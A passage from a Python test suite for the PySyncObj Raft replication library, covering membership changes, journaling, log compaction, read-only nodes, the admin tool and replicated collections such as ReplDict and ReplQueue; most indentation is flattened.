o3._forceLogCompaction()
doTicks(objs, 0.5)
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader() == o3._getLeader()
o3._destroy()
objs = [o1, o2]
o1.addValue(2)
o1.addValue(3)
doTicks(objs, 0.5)
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 0.5)
o3 = TestObj(a[2], [a[0], a[1]], dumpFile=dumpFiles[2])
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1._destroy()
o2._destroy()
o3._destroy()
removeFiles(dumpFiles)
def __checkParnerNodeExists(obj, nodeAddr, shouldExist=True):
nodeAddrSet = {node.address for node in obj._SyncObj__otherNodes}
    # True iff nodeAddr's presence in the set of other nodes matches shouldExist.
    return (nodeAddr in nodeAddrSet) == shouldExist
def test_doChangeClusterUT1():
dumpFiles = [getNextDumpFile()]
removeFiles(dumpFiles)
baseAddr = getNextAddr()
oterAddr = getNextAddr()
o1 = TestObj(baseAddr, ['localhost:1235', oterAddr], dumpFile=dumpFiles[0], dynamicMembershipChange=True)
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', False)
__checkParnerNodeExists(o1, 'localhost:1235', True)
noop = _bchr(_COMMAND_TYPE.NO_OP)
member = _bchr(_COMMAND_TYPE.MEMBERSHIP)
# Check regular configuration change - adding
o1._SyncObj__onMessageReceived(TCPNode('localhost:12345'), {
'type': 'append_entries',
'term': 1,
'prevLogIdx': 1,
'prevLogTerm': 0,
'commit_index': 2,
'entries': [(noop, 2, 1), (noop, 3, 1), (member + pickle.dumps(['add', 'localhost:1238']), 4, 1)]
})
__checkParnerNodeExists(o1, 'localhost:1238', True)
__checkParnerNodeExists(o1, 'localhost:1239', False)
# Check rollback adding
o1._SyncObj__onMessageReceived(TCPNode('localhost:1236'), {
'type': 'append_entries',
'term': 2,
'prevLogIdx': 2,
'prevLogTerm': 1,
'commit_index': 3,
'entries': [(noop, 3, 2), (member + pickle.dumps(['add', 'localhost:1239']), 4, 2)]
})
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', True)
__checkParnerNodeExists(o1, oterAddr, True)
# Check regular configuration change - removing
o1._SyncObj__onMessageReceived(TCPNode('localhost:1236'), {
'type': 'append_entries',
'term': 2,
'prevLogIdx': 4,
'prevLogTerm': 2,
'commit_index': 4,
'entries': [(member + pickle.dumps(['rem', 'localhost:1235']), 5, 2)]
})
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', True)
__checkParnerNodeExists(o1, 'localhost:1235', False)
# Check log compaction
o1._forceLogCompaction()
doTicks([o1], 0.5)
o1._destroy()
    o2 = TestObj(oterAddr, [baseAddr, 'localhost:1236'], dumpFile=dumpFiles[0], dynamicMembershipChange=True)
doTicks([o2], 0.5)
__checkParnerNodeExists(o2, oterAddr, False)
__checkParnerNodeExists(o2, baseAddr, True)
__checkParnerNodeExists(o2, 'localhost:1238', False)
__checkParnerNodeExists(o2, 'localhost:1239', True)
__checkParnerNodeExists(o2, 'localhost:1235', False)
o2._destroy()
removeFiles(dumpFiles)
def test_doChangeClusterUT2():
a = [getNextAddr(), getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[2], a[0]], dynamicMembershipChange=True)
o3 = TestObj(a[2], [a[0], a[1]], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady() == o2._isReady() == o3._isReady() == True
o3.addValue(50)
o2.addNodeToCluster(a[3])
success = False
for i in xrange(10):
doTicks([o1, o2, o3], 0.5)
res = True
res &= __checkParnerNodeExists(o1, a[3], True)
res &= __checkParnerNodeExists(o2, a[3], True)
res &= __checkParnerNodeExists(o3, a[3], True)
if res:
success = True
break
o2.addNodeToCluster(a[3])
assert success
o4 = TestObj(a[3], [a[0], a[1], a[2]], dynamicMembershipChange=True)
doTicks([o1, o2, o3, o4], 10, stopFunc=lambda: o4._isReady())
o1.addValue(450)
doTicks([o1, o2, o3, o4], 10, stopFunc=lambda: o4.getCounter() == 500)
assert o4.getCounter() == 500
o1._destroy()
o2._destroy()
o3._destroy()
o4._destroy()
def test_journalTest1():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and \
o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1.addValue(100)
o2.addValue(150)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 600 and o2.getCounter() == 600)
assert o1.getCounter() == 600
assert o2.getCounter() == 600
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 0.5)
o1.addValue(150)
o2.addValue(150)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 900 and o2.getCounter() == 900)
assert o1.getCounter() == 900
assert o2.getCounter() == 900
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and \
o1.getCounter() == 900 and o2.getCounter() == 900)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 900
assert o2.getCounter() == 900
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_journalTest2():
journalFiles = [getNextJournalFile()]
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
removeFiles(journalFiles)
journal = createJournal(journalFiles[0])
journal.add(b'cmd1', 1, 0)
journal.add(b'cmd2', 2, 0)
journal.add(b'cmd3', 3, 0)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 3
assert journal[0] == (b'cmd1', 1, 0)
assert journal[-1] == (b'cmd3', 3, 0)
journal.deleteEntriesFrom(2)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 2
assert journal[0] == (b'cmd1', 1, 0)
assert journal[-1] == (b'cmd2', 2, 0)
journal.deleteEntriesTo(1)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 1
assert journal[0] == (b'cmd2', 2, 0)
journal._destroy()
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_applyJournalAfterRestart():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
doTicks(objs, 2)
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
objs = [o1]
    doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350)
assert o1.getCounter() == 350
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_autoTick1():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.AUTO_TICK_1)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.AUTO_TICK_1)
assert not o1._isReady()
assert not o2._isReady()
time.sleep(4.5)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
time.sleep(1.5)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
assert o2.addValueSync(10) == 360
assert o1.addValueSync(20) == 380
o1._destroy()
o2._destroy()
time.sleep(0.5)
def test_largeCommands():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[0], leaderFallbackTimeout=60.0)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[1], leaderFallbackTimeout=60.0)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
# Generate ~20Mb data.
testRandStr = getRandStr()
bigStr = ''
for i in xrange(0, 200):
bigStr += getRandStr()
o1.addKeyValue('big', bigStr)
o1.addKeyValue('test', testRandStr)
# Wait for replication.
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr and \
o1.getValue('big') == bigStr and \
o2.getValue('big') == bigStr)
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
o1._forceLogCompaction()
o2._forceLogCompaction()
# Wait for disk dump
doTicks(objs, 8.0)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[0], leaderFallbackTimeout=60.0)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[1], leaderFallbackTimeout=60.0)
objs = [o1, o2]
# Wait for disk load, election and replication
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr and \
o1.getValue('big') == bigStr and \
o2.getValue('big') == bigStr and \
o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_readOnlyNodes():
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], password='123')
o2 = TestObj(a[1], [a[2], a[0]], password='123')
o3 = TestObj(a[2], [a[0], a[1]], password='123')
objs = [o1, o2, o3]
b1 = TestObj(None, [a[0], a[1], a[2]], password='123')
b2 = TestObj(None, [a[0], a[1], a[2]], password='123')
roObjs = [b1, b2]
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o3.getCounter() == 350)
doTicks(objs + roObjs, 4.0, stopFunc=lambda: b1.getCounter() == 350 and b2.getCounter() == 350)
assert b1.getCounter() == b2.getCounter() == 350
assert o1._getLeader() == b1._getLeader() == o2._getLeader() == b2._getLeader()
assert b1._getLeader().address in a
prevLeader = o1._getLeader()
newObjs = [o for o in objs if o._SyncObj__selfNode != prevLeader]
assert len(newObjs) == 2
doTicks(newObjs + roObjs, 10.0, stopFunc=lambda: newObjs[0]._getLeader() != prevLeader and \
newObjs[0]._getLeader() is not None and \
newObjs[0]._getLeader().address in a and \
newObjs[0]._getLeader() == newObjs[1]._getLeader())
assert newObjs[0]._getLeader() != prevLeader
assert newObjs[0]._getLeader().address in a
assert newObjs[0]._getLeader() == newObjs[1]._getLeader()
newObjs[1].addValue(50)
doTicks(newObjs + roObjs, 10.0, stopFunc=lambda: newObjs[0].getCounter() == 400 and b1.getCounter() == 400)
o1._printStatus()
o2._printStatus()
o3._printStatus()
b1._printStatus()
assert newObjs[0].getCounter() == 400
assert b1.getCounter() == 400
doTicks(objs + roObjs, 10.0,
stopFunc=lambda: sum([int(o.getCounter() == 400) for o in objs + roObjs]) == len(objs + roObjs))
for o in objs + roObjs:
assert o.getCounter() == 400
currRes = {}
def onAdd(res, err):
currRes[0] = err
b1.addValue(50, callback=onAdd)
doTicks(objs + roObjs, 5.0, stopFunc=lambda: o1.getCounter() == 450 and \
b1.getCounter() == 450 and \
b2.getCounter() == 450 and
currRes.get(0) == FAIL_REASON.SUCCESS)
assert o1.getCounter() == 450
assert b1.getCounter() == 450
assert b2.getCounter() == 450
assert currRes.get(0) == FAIL_REASON.SUCCESS
# check that all objects have 2 readonly nodes
assert all(map(lambda o: o.getStatus()['readonly_nodes_count'] == 2, objs))
# disconnect readonly node
b1._destroy()
doTicks(objs, 2.0)
assert all(map(lambda o: o.getStatus()['readonly_nodes_count'] == 1, objs))
o1._destroy()
o2._destroy()
o3._destroy()
b1._destroy()
b2._destroy()
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_syncobjAdminStatus():
assert HAS_CRYPTO
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], password='123')
o2 = TestObj(a[1], [a[0]], password='123')
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
status1 = o1.getStatus()
status2 = o2.getStatus()
assert 'version' in status1
assert 'log_len' in status2
trueRes = {
o1: '\n'.join('%s: %s' % (k, v) for k, v in sorted(status1.items())),
o2: '\n'.join('%s: %s' % (k, v) for k, v in sorted(status2.items())),
}
currRes = {
}
args = {
o1: ['-conn', a[0], '-pass', '123', '-status'],
o2: ['-conn', a[1], '-pass', '123', '-status'],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes,
stopFunc=lambda: currRes.get(o1) is not None and currRes.get(o2) is not None)
assert len(currRes[o1]) == len(trueRes[o1])
assert len(currRes[o2]) == len(trueRes[o2])
o1._destroy()
o2._destroy()
def test_syncobjAdminAddRemove():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], dynamicMembershipChange=True)
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
trueRes = 'SUCCESS ADD ' + a[2]
currRes = {}
args = {
o1: ['-conn', a[0], '-add', a[2]],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
o3 = TestObj(a[2], [a[1], a[0]], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
trueRes = 'SUCCESS REMOVE ' + a[2]
args[o1] = None
args[o2] = ['-conn', a[1], '-remove', a[2]]
doSyncObjAdminTicks([o1, o2, o3], args, 10.0, currRes, stopFunc=lambda: currRes.get(o2) is not None)
assert currRes[o2] == trueRes
o3._destroy()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
o1._destroy()
o2._destroy()
def test_syncobjAdminSetVersion():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], dynamicMembershipChange=True)
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1.getCodeVersion() == 0
assert o2.getCodeVersion() == 0
o2.testMethod()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getValue('testKey') == 'valueVer1' and \
o2.getValue('testKey') == 'valueVer1')
assert o1.getValue('testKey') == 'valueVer1'
assert o2.getValue('testKey') == 'valueVer1'
trueRes = 'SUCCESS SET_VERSION 1'
currRes = {}
args = {
o1: ['-conn', a[0], '-set_version', '1'],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getCodeVersion() == 1 and o2.getCodeVersion() == 1)
assert o1.getCodeVersion() == 1
assert o2.getCodeVersion() == 1
o2.testMethod()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getValue('testKey') == 'valueVer2' and \
o2.getValue('testKey') == 'valueVer2')
assert o1.getValue('testKey') == 'valueVer2'
assert o2.getValue('testKey') == 'valueVer2'
o1._destroy()
o2._destroy()
@pytest.mark.skipif(os.name == 'nt', reason='temporary disabled for windows')
def test_syncobjWaitBinded():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], testType=TEST_TYPE.WAIT_BIND)
o2 = TestObj(a[1], [a[0]], testType=TEST_TYPE.WAIT_BIND)
o1.waitBinded()
o2.waitBinded()
o3 = TestObj(a[1], [a[0]], testType=TEST_TYPE.WAIT_BIND)
with pytest.raises(SyncObjException):
o3.waitBinded()
o1.destroy()
o2.destroy()
o3.destroy()
@pytest.mark.skipif(os.name == 'nt', reason='temporary disabled for windows')
def test_unpickle():
data = {'foo': 'bar', 'command': b'\xfa', 'entries': [b'\xfb', b'\xfc']}
python2_cpickle = b'\x80\x02}q\x01(U\x03fooq\x02U\x03barq\x03U\x07commandq\x04U\x01\xfaU\x07entriesq\x05]q\x06(U\x01\xfbU\x01\xfceu.'
python2_pickle = b'\x80\x02}q\x00(U\x03fooq\x01U\x03barq\x02U\x07commandq\x03U\x01\xfaq\x04U\x07entriesq\x05]q\x06(U\x01\xfbq\x07U\x01\xfcq\x08eu.'
python3_pickle = b'\x80\x02}q\x00(X\x03\x00\x00\x00fooq\x01X\x03\x00\x00\x00barq\x02X\x07\x00\x00\x00commandq\x03c_codecs\nencode\nq\x04X\x02\x00\x00\x00\xc3\xbaq\x05X\x06\x00\x00\x00latin1q\x06\x86q\x07Rq\x08X\x07\x00\x00\x00entriesq\t]q\n(h\x04X\x02\x00\x00\x00\xc3\xbbq\x0bh\x06\x86q\x0cRq\rh\x04X\x02\x00\x00\x00\xc3\xbcq\x0eh\x06\x86q\x0fRq\x10eu.'
python2_cpickle_data = pickle.loads(python2_cpickle)
assert data == python2_cpickle_data, 'Failed to unpickle data pickled by python2 cPickle'
python2_pickle_data = pickle.loads(python2_pickle)
assert data == python2_pickle_data, 'Failed to unpickle data pickled by python2 pickle'
python3_pickle_data = pickle.loads(python3_pickle)
assert data == python3_pickle_data, 'Failed to unpickle data pickled by python3 pickle'
class TestConsumer1(SyncObjConsumer):
def __init__(self):
super(TestConsumer1, self).__init__()
self.__counter = 0
@replicated
def add(self, value):
self.__counter += value
@replicated
def set(self, value):
self.__counter = value
def get(self):
return self.__counter
class TestConsumer2(SyncObjConsumer):
def __init__(self):
super(TestConsumer2, self).__init__()
self.__values = {}
@replicated
def set(self, key, value):
self.__values[key] = value
def get(self, key):
return self.__values.get(key)
def test_consumers():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
c11 = TestConsumer1()
c12 = TestConsumer1()
c13 = TestConsumer2()
c21 = TestConsumer1()
c22 = TestConsumer1()
c23 = TestConsumer2()
c31 = TestConsumer1()
c32 = TestConsumer1()
c33 = TestConsumer2()
o1 = TestObj(a[0], [a[1], a[2]], consumers=[c11, c12, c13])
o2 = TestObj(a[1], [a[0], a[2]], consumers=[c21, c22, c23])
o3 = TestObj(a[2], [a[0], a[1]], consumers=[c31, c32, c33])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
c11.set(42)
c11.add(10)
c12.add(15)
c13.set('testKey', 'testValue')
doTicks(objs, 10.0, stopFunc=lambda: c21.get() == 52 and c22.get() == 15 and c23.get('testKey') == 'testValue')
assert c21.get() == 52
assert c22.get() == 15
assert c23.get('testKey') == 'testValue'
o1.forceLogCompaction()
o2.forceLogCompaction()
doTicks(objs, 0.5)
objs = [o1, o2, o3]
doTicks(objs, 10.0, stopFunc=lambda: c31.get() == 52 and c32.get() == 15 and c33.get('testKey') == 'testValue')
assert c31.get() == 52
assert c32.get() == 15
assert c33.get('testKey') == 'testValue'
o1.destroy()
o2.destroy()
o3.destroy()
def test_batteriesCommon():
d1 = ReplDict()
l1 = ReplLockManager(autoUnlockTime=30.0)
d2 = ReplDict()
l2 = ReplLockManager(autoUnlockTime=30.0)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.AUTO_TICK_1, consumers=[d1, l1])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.AUTO_TICK_1, consumers=[d2, l2])
doAutoTicks(10.0, stopFunc=lambda: o1.isReady() and o2.isReady())
assert o1.isReady() and o2.isReady()
d1.set('testKey', 'testValue', sync=True)
doAutoTicks(3.0, stopFunc=lambda: d2.get('testKey') == 'testValue')
assert d2['testKey'] == 'testValue'
d2.pop('testKey', sync=True)
doAutoTicks(3.0, stopFunc=lambda: d1.get('testKey') == None)
assert d1.get('testKey') == None
assert l1.tryAcquire('test.lock1', sync=True) == True
assert l2.tryAcquire('test.lock1', sync=True) == False
assert l2.isAcquired('test.lock1') == False
l1id = l1._ReplLockManager__selfID
l1._ReplLockManager__lockImpl.prolongate(l1id, 0, _doApply=True)
l1.release('test.lock1', sync=True)
assert l2.tryAcquire('test.lock1', sync=True) == True
assert d1.setdefault('keyA', 'valueA', sync=True) == 'valueA'
assert d2.setdefault('keyA', 'valueB', sync=True) == 'valueA'
d2.pop('keyA', sync=True)
assert d2.setdefault('keyA', 'valueB', sync=True) == 'valueB'
o1.destroy()
o2.destroy()
l1.destroy()
l2.destroy()
def test_ReplCounter():
c = ReplCounter()
c.set(42, _doApply=True)
assert c.get() == 42
c.add(10, _doApply=True)
assert c.get() == 52
c.sub(20, _doApply=True)
assert c.get() == 32
c.inc(_doApply=True)
assert c.get() == 33
def test_ReplList():
l = ReplList()
l.reset([1, 2, 3], _doApply=True)
assert l.rawData() == [1, 2, 3]
l.set(1, 10, _doApply=True)
assert l.rawData() == [1, 10, 3]
l.append(42, _doApply=True)
assert l.rawData() == [1, 10, 3, 42]
l.extend([5, 6], _doApply=True)
assert l.rawData() == [1, 10, 3, 42, 5, 6]
l.insert(2, 66, _doApply=True)
assert l.rawData() == [1, 10, 66, 3, 42, 5, 6]
l.remove(66, _doApply=True)
assert l.rawData() == [1, 10, 3, 42, 5, 6]
l.pop(1, _doApply=True)
assert l.rawData() == [1, 3, 42, 5, 6]
l.sort(reverse=True, _doApply=True)
assert l.rawData() == [42, 6, 5, 3, 1]
assert l.index(6) == 1
assert l.count(42) == 1
assert l.get(2) == 5
assert l[4] == 1
assert len(l) == 5
l.__setitem__(0, 43, _doApply=True)
assert l[0] == 43
def test_ReplDict():
d = ReplDict()
d.reset({
1: 1,
2: 22,
}, _doApply=True)
assert d.rawData() == {
1: 1,
2: 22,
}
d.__setitem__(1, 10, _doApply=True)
assert d.rawData() == {
1: 10,
2: 22,
}
d.set(1, 20, _doApply=True)
assert d.rawData() == {
1: 20,
2: 22,
}
assert d.setdefault(1, 50, _doApply=True) == 20
assert d.setdefault(3, 50, _doApply=True) == 50
d.update({
5: 5,
6: 7,
}, _doApply=True)
assert d.rawData() == {
1: 20,
2: 22,
3: 50,
5: 5,
6: 7,
}
assert d.pop(3, _doApply=True) == 50
assert d.pop(6, _doApply=True) == 7
assert d.pop(6, _doApply=True) == None
assert d.pop(6, 0, _doApply=True) == 0
assert d.rawData() == {
1: 20,
2: 22,
5: 5,
}
assert d[1] == 20
assert d.get(2) == 22
assert d.get(22) == None
assert d.get(22, 10) == 10
assert len(d) == 3
assert 2 in d
assert 22 not in d
assert sorted(d.keys()) == [1, 2, 5]
assert sorted(d.values()) == [5, 20, 22]
assert d.items() == d.rawData().items()
d.clear(_doApply=True)
assert len(d) == 0
def test_ReplSet():
s = ReplSet()
s.reset({1, 4}, _doApply=True)
assert s.rawData() == {1, 4}
s.add(10, _doApply=True)
assert s.rawData() == {1, 4, 10}
s.remove(1, _doApply=True)
s.discard(10, _doApply=True)
assert s.rawData() == {4}
assert s.pop(_doApply=True) == 4
s.add(48, _doApply=True)
s.update({9, 2, 3}, _doApply=True)
assert s.rawData() == {9, 2, 3, 48}
assert len(s) == 4
assert 9 in s
assert 42 not in s
s.clear(_doApply=True)
assert len(s) == 0
assert 9 not in s
def test_ReplQueue():
q = ReplQueue()
q.put(42, _doApply=True)
q.put(33, _doApply=True)
q.put(14, _doApply=True)
assert q.get(_doApply=True) == 42
assert q.qsize() == 2
assert len(q) == 2
assert q.empty() == False
assert q.get(_doApply=True) == 33
assert q.get(-1, _doApply=True) == 14
assert q.get(_doApply=True) == None
assert q.get(-1, _doApply=True) == -1
assert q.empty()
q = ReplQueue(3)
q.put(42, _doApply=True)
q.put(33, _doApply=True)
assert q.full() == False
assert q.put(14, _doApply=True) == True
assert q.full() == True
assert q.put(19, _doApply=True) == False
assert q.get(_doApply=True) == 42
def test_ReplPriorityQueue():
q = ReplPriorityQueue()
q.put(42, _doApply=True)
q.put(14, _doApply=True)
q.put(33, _doApply=True)
assert q.get(_doApply=True) == 14
assert q.qsize() == 2
assert len(q) == 2
assert q.empty() == False
assert q.get(_doApply=True) == 33
assert q.get(-1, _doApply=True) == 42
assert q.get(_doApply=True) == None
assert q.get(-1, _doApply=True) == -1
assert q.empty()
q = ReplPriorityQueue(3)
q.put(42, _doApply=True)
q.put(33, _doApply=True)
assert q.full() == False
assert q.put(14, _doApply=True) == True
assert q.full() == True
assert q.put(19, _doApply=True) == False
assert q.get(_doApply=True) == 14
# https://github.com/travis-ci/travis-ci/issues/8695
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('TRAVIS') == 'true', reason='temporary disabled for windows')
def test_ipv6():
random.seed(42)
a = [getNextAddr(ipv6=True), getNextAddr(ipv6=True)]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_localhost():
random.seed(42)
a = [getNextAddr(isLocalhost=True), getNextAddr(isLocalhost=True)]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 3.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
